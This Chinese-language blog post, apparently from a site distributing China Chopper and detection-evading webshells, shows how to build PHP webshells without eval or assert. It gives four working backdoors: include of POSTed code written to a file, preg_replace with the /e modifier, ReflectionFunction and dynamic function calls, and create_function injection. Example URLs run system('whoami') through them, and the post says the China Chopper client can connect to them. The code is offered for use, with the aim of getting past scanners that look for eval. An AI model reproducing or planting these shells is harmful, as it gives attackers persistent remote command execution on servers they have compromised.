不使用eval、assert制作webshell

1、include函数

实现思路:将POST过来的参数写入到一个文本里,再去包含文本实现代码执行

<?php

@$pwd=$_POST['pwd'];
$include_file='code.txt'; 
if(isset($pwd)){
    file_put_contents($include_file,'<?php '.$pwd);
    include $include_file;
    unlink($include_file);
}

?>

《不使用eval、assert制作webshell》

也可以使用菜刀连接

《不使用eval、assert制作webshell》

《不使用eval、assert制作webshell》

 

2、preg_replace函数

实现思路:使用/e修饰符实现代码执行

<?php
@preg_replace("//e",$_POST['pwd'],"luck");
?>

《不使用eval、assert制作webshell》

 

3、ReflectionFunction & 动态函数

<?php
$func = new ReflectionFunction($_GET['func_name']);
$func->invokeArgs($_GET['args']);
?>
http://127.0.0.1/code_exec.php?func_name=system&args[0]=whoami

《不使用eval、assert制作webshell》

动态函数

<?php
$_GET['function']($_GET['args']);
?>

example:

http://127.0.0.1/code_exec.php?function=system&args=whoami

《不使用eval、assert制作webshell》

 

4、create_function

<?php
$code=$_GET['code'];
$str2=";}{$code};/*";
echo $str2.'<hr>';
$f1 = create_function('$a',$str2);
?>

《不使用eval、assert制作webshell》

也可以直接用菜刀连接

原理:

function name($a){
;}system("whoami");/*
}

这样看得一目了然

function name($a){
;}

system("whoami");/*}

相关推荐

版权所有:《Xise菜刀_Xise菜刀下载_中国菜刀_免杀大马_最新免杀大马
文章标题:《不使用eval、assert制作webshell
除非注明,文章均为 《Xise菜刀_Xise菜刀下载_中国菜刀_免杀大马_最新免杀大马》 原创
转载请注明本文短网址:http://caidaome.com/?post=105  [生成短网址]

发表评论

路人甲
看不清楚?点图切换

网友评论(0)